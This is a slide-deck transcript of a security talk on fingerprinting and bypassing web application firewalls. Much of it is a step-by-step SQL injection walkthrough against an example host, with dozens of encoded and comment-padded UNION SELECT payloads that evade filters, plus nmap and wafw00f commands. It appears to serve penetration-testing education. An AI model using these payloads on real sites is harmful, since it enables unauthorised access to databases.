Download - Waf bypassing Techniques

Transcript
Page 1: Waf bypassing Techniques

WAF BypassingTechniques

Page 2: Waf bypassing Techniques

Avinash Kumar Thapa, Senior Security Analyst in Network Intelligence India

Bug Hunter on Hackerone CTF Author on Vulnhub.com Some exploits and PoC on Exploit-db as well. Passionate about Web Applications Security and Exploit Writing.

Page 3: Waf bypassing Techniques

Agenda Introduction to Web Applications Firewalls Operation Modes Vendors Fingerprinting WAF Ways to Bypass WAFs Practical Cases for Bypassing Conclusion

Page 4: Waf bypassing Techniques

Introduction to Web Application Firewalls

Presents as Application Layer Monitors all HTTP/HTTPs/SOAP/XML-RPC Web services traffic between client and servers

based upon their pre-defined signatures in a database. Basic goal of WAF is to monitor and block the contents that violates pre-defined policy. These pre-defined policies are patterns of user input which ends up in potential attack. Understands HTTP and HTTPs traffic better than any traditional firewall.

Page 5: Waf bypassing Techniques

Types of Operation Modes

Page 6: Waf bypassing Techniques

Negative ModeA negative security model recognize attacks by relying on a database of expected attack signatures.Example:Do not allow in any page, any argument value (user input) which match potential XSS strings like <script>,</script>, String.fromCharCode, etc.

Pros:● Less time to implement.

Cons:● Less protection.

Page 7: Waf bypassing Techniques

Positive Model A positive security model enforces positive behaviour by learning the application logic and the

building a security policy of valid known requests as a user interacts with the application.Example: Page news.jsp, the field id could only accept characters [0-9] and starting at number 0 until

65535. Using intval conditions on page. (Accepts only integers)Pros:● Better performance (less rules).● Less false positives.Cons:● Much more time to implement.● Some vendors provide “automatic learning mode”, they help, but are far from perfect,in the end, you always need a skilled human to review the policies

Page 8: Waf bypassing Techniques

Mix Model

Combination of both positive and negative model.

Page 9: Waf bypassing Techniques

Testing Environments Google Chrome Mozilla Firefox Internet Explorer Opera Browser

Page 10: Waf bypassing Techniques

Products F5 BIG IP WAF Sucuri Modsecurity Imperva Incapsula PHP-IDS (PHP Intrusion Detection System) Quick Defense AQTRONIX WebKnight (For IIS and based on ISAPI filters) Barracuda WAF

Page 11: Waf bypassing Techniques

Fingerprinting WAFAdds Cookie to the HTTP Communication. For Citrix Netscaler WAF

Page 12: Waf bypassing Techniques

Fingerprinting WAF F5 BIG IP ASM

Page 13: Waf bypassing Techniques

Fingerprinting WAF On the basis of HTTP Response

Other WAF’s may be detected by the type of http response we receive when submitting a malicious request, responses may vary depending upon a WAF to a WAF. Some of the common responses are 403, 406, 419, 500, 501 etc.

Page 14: Waf bypassing Techniques

Fingerprinting WAF Response for BIG F5

Page 15: Waf bypassing Techniques

Fingerprinting WAF Request and Response for ModSecurity Firewall

Request:

Page 16: Waf bypassing Techniques

Fingerprinting WAF Request and Response for ModSecurity Firewall

Response:

Page 17: Waf bypassing Techniques

Fingerprinting WAF Response for WebKnight Firewall

Response:

Page 18: Waf bypassing Techniques

Fingerprinting WAF Response for WebKnight Firewall

Response rendered on Browser

Page 19: Waf bypassing Techniques

Automatic Fingerprinting WAF Using Nmap Scripts

nmap -p80 --script http-waf-detect <host>

Using WaFw00f.py

Python Wafw00f.py –url <URL>

Page 20: Waf bypassing Techniques

Techniques to Bypass WAFs

Bypassing WAF For SQL Injection Vulnerabilities Bypassing WAF for XSS Issues Bypassing WAF for LFI and RFI vulnerabilities.

Page 21: Waf bypassing Techniques

General Techniques to bypass WAF Null Character Injection Mixed Case Inline Comments Chunked Requests Buffer Overflow HTTP Parameter Pollution URL encoding Keyword Splitting

Replaced Keywords Ignoring Cookies Using Data URIs Header Injection

Page 22: Waf bypassing Techniques

Bypassing WAF For SQL Injection Vulnerabilities

Page 23: Waf bypassing Techniques

https://abc.com/index.php?id=1

Example 1 (Without WAF)

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6

Example 1 (With WAF)

https://abc.com/index.php?id=1‘HTTP/1.1 403 Forbidden ErrorOrHTTP/1.1 406 Not AcceptableorHTTP/1.1 404 Not FoundOrHTTP/1.1 500 Internal Server ErrorOrHTTP/1.1 400 Bad Request

Page 24: Waf bypassing Techniques

Some recon on WAF

Came to know Modsecurity is in action

https://abc.com/index.php?id=1

“HTTP/1.1 200 OK

https://abc.com/index.php?id=1

%27

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1’ ' at line 6

This technique is URL Encoding

Some time you need to use:1) Double URL Encoding :- %2527%27’2) Triple URL Encoding:- %252525%2527%27’ (This is very rare Case)

Page 25: Waf bypassing Techniques

https://abc.com/index.php?id=1

%27 ORDER BY 1%23

HTTP/1.1 403 Forbidden

Assumptions in mind• ‘Order’ keyword is Blocked ??• ‘Order by ’ keyword is Blocked ??• Any other alternative of Order by query ??• Does Spaces are blocked

Let’s Try

Page 26: Waf bypassing Techniques

https://abc.com/index.php?id=1

%27 ORDER %23

HTTP/1.1 403 Forbidden

Assumptions in mind• ‘Order’ keyword is Blocked• Check again ‘order’ is blocked ??

https://abc.com/index.php?id=1

%27ORDER%23HTTP/1.1 200 OK

New Assumptions in mind• ‘Order’ keyword is not Blocked• What is blocked then ???

SPACES ARE BLOCKED

Page 27: Waf bypassing Techniques

https://abc.com/index.php?id=1

%27 ORDER by 1 %23

HTTP/1.1 403 Forbidden

https://abc.com/index.php?id=1

%27ORDERby1 %23

HTTP/1.1 200 OK

No Assumptions in mind

Because spaces are blocked only

Page 28: Waf bypassing Techniques

Techniques to bypass spacesUsing ‘+’ instead of space like:- order+by+1 (Mostly blocked)Using inline comments instead of spaces ‘/**/’ like:- order/**/by/**/1Using combination of inline comments and URL encoding instead of spaces like:

• Order/%2a%2a/by/%2a%2a/1• Order%2f**%2fby%2f**%2f1

Using combination of inline comments, URL encoding & Junk Characters instead of spaces like:

• Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1• Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1

Page 29: Waf bypassing Techniques

Techniques to bypass spaces

Using white space characters %0a, %0b, %0c, %0d,%a0,%09,%01

Query will be ORDER%0aby%0a1 ORDER%0bby%0b1 ORDER%0cby%0c1 ORDER%0Dby%0D1 ORDER%A0by%A01 ORDER%0D%0Aby%0D%0A1

Page 30: Waf bypassing Techniques

https://abc.com/index.php?id=1

%27/**/ORDER/**/by/**/1%23

HTTP/1.1 200 OK

Let’s Suppose no. of columns are 3

https://abc.com/index.php?id=1

%27 UNION SELECT 1,2,3%23

HTTP/1.1 403 Forbidden

Assumptions in mind• ‘Spaces’ are Blocked ??

Page 31: Waf bypassing Techniques

https://abc.com/index.php?id=1

%27/**/UNION/**/SELECT/**/1,2,3%23

HTTP/1.1 403 Forbidden

Assumptions in mind• ‘Spaces’ were bypassed using inline

comments..…Still blocked???• ‘UNION’ keyword is blocked ??• ‘SELECT’ keyword is blocked ??• ‘Intergers’ are blocked ??• ‘Commas’ are blocked ?• Combination of “UNION SELECT” is blocked• “SELECT with Integers” are blocked

Page 32: Waf bypassing Techniques

Techniques to Bypass

Using Inline comments: /!*50000UNION*/ /*!40000UNION*/ /*!00000UNION*/

If UNION is blocked

Using URL Encoding Techniques: %53nion %2553nion %55%4e%49%4f%4e (UNION)

Double URL Encoding

Triple URL Encoding

Page 33: Waf bypassing Techniques

https://abc.com/index.php?id=1

%27/**//*!50000UNION*//**/SELECT/**/1,2,3%23

https://abc.com/index.php?id=1

%27/**//*!40000UNION*//**/SELECT/**/1,2,3%23https://abc.com/index.php?id=1

%27/**//*!%55NION*//**/SELECT/**/1,2,3%23

https://abc.com/index.php?id=1

%27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23

HTTP/1.1 403 Forbidden Assumptions in mind• ‘UNION’ keyword is blocked ??• ‘SELECT’ keyword is blocked ??• ‘Intergers’ are blocked ??• ‘Commas’ are blocked ?• Combination of “UNION SELECT” is blocked• “SELECT with Integers” are blocked

Page 34: Waf bypassing Techniques

https://abc.com/index.php?id=1

%27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23

https://abc.com/index.php?id=1

%27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23https://abc.com/index.php?

id=1%27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23

https://abc.com/index.php?id=1

%27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23

HTTP/1.1 403 Forbidden

Assumptions in mind• ‘UNION’ keyword is blocked ??• ‘SELECT’ keyword is blocked ??• ‘Intergers’ are blocked ??• ‘Commas’ are blocked ?• Combination of “UNION SELECT” is blocked• “SELECT with Integers” are blocked

Page 35: Waf bypassing Techniques

https://abc.com/index.php?id=1

%27/**//*!50000UNION*/1,2,3%23

HTTP/1.1 200 OK

https://abc.com/index.php?id=1

%27/**//*!50000SELECT*/1,2,3%23

HTTP/1.1 200 OK

Assumptions in mind• ‘UNION’ keyword is NOT blocked.• ‘SELECT’ keyword is NOT blocked.• ‘Intergers’ are NOT blocked • ‘Commas’ are NOT blocked • Combination of “UNION SELECT” is blocked ?• “SELECT with Integers” are NOT blocked

Page 36: Waf bypassing Techniques

Techniques to bypass combination of “union select”Using combination of inline comments and URL encoding :• /*!50000%55niOn*/ /*!50000%53eLECT*/

Using white spaces and URL encoding of comments (#)

• Union%23%0aSELECT• Union%23%0bSELECT• Union%23%0cSELECT• Union%23%0DSELECT• Union%23%A0SELECT

Using combination of inline comments and URL encoding :• /*!50000%55niOn*/ /*!50000%53eLECT*/

Page 37: Waf bypassing Techniques

Techniques to bypass combination of “union select”

Using Buffer Overflow

UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECTSome time need to increase the junk as per the requirement

UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT

Page 38: Waf bypassing Techniques

Techniques to bypass combination of “union select”Using Distinct statement

UNION DISTINCT SELECT

Using Distinctrow statement

UNION DISTINCTROW SELECT

Page 39: Waf bypassing Techniques

https://abc.com/index.php?id=1%27/**/UNION

%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT/**/1,2,3%23

HTTP/1.1 200 OK

Page 40: Waf bypassing Techniques

Special Case : What if Commas got blocked ?

Page 41: Waf bypassing Techniques

https://abc.com/index.php?id=1

%27/**/UNION/**/SELECT/**/1,2,3%23

HTTP/1.1 403 Forbidden

Assumptions in mind• ‘UNION’ keyword is NOT blocked.• ‘SELECT’ keyword is NOT blocked.• ‘Intergers’ are NOT blocked • ‘Commas’ are blocked • Combination of “UNION SELECT” is NOT

blocked ?• “SELECT with Integers” are NOT blocked

Time to bypass commas “,”.

Page 42: Waf bypassing Techniques

Basic Bypasses URL Encoding - %2c , Double URL Encoding - %252c %2c , Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2

Page 43: Waf bypassing Techniques

Basic Bypasses URL Encoding - %2c , Double URL Encoding - %252c %2c , Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2

Page 44: Waf bypassing Techniques

Advance way to bypass “Commas” Using JOIN

JOIN used for columns as UNION is used for the rows

We have SELECT 1,2,3

SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c

Page 45: Waf bypassing Techniques

Advance way to bypass “Commas” https://abc.com/index.php?id=1

%27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b%23

HTTP/1.1 200 OK

Page 46: Waf bypassing Techniques

Similar Approach for other Vulnerabilities For XSS For LFI / RFI

DEMO TIME

Page 47: Waf bypassing Techniques

References Images in slides 10,11,14,15,16,17 Taken from

http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYBALOCH.pdf

Thank you..!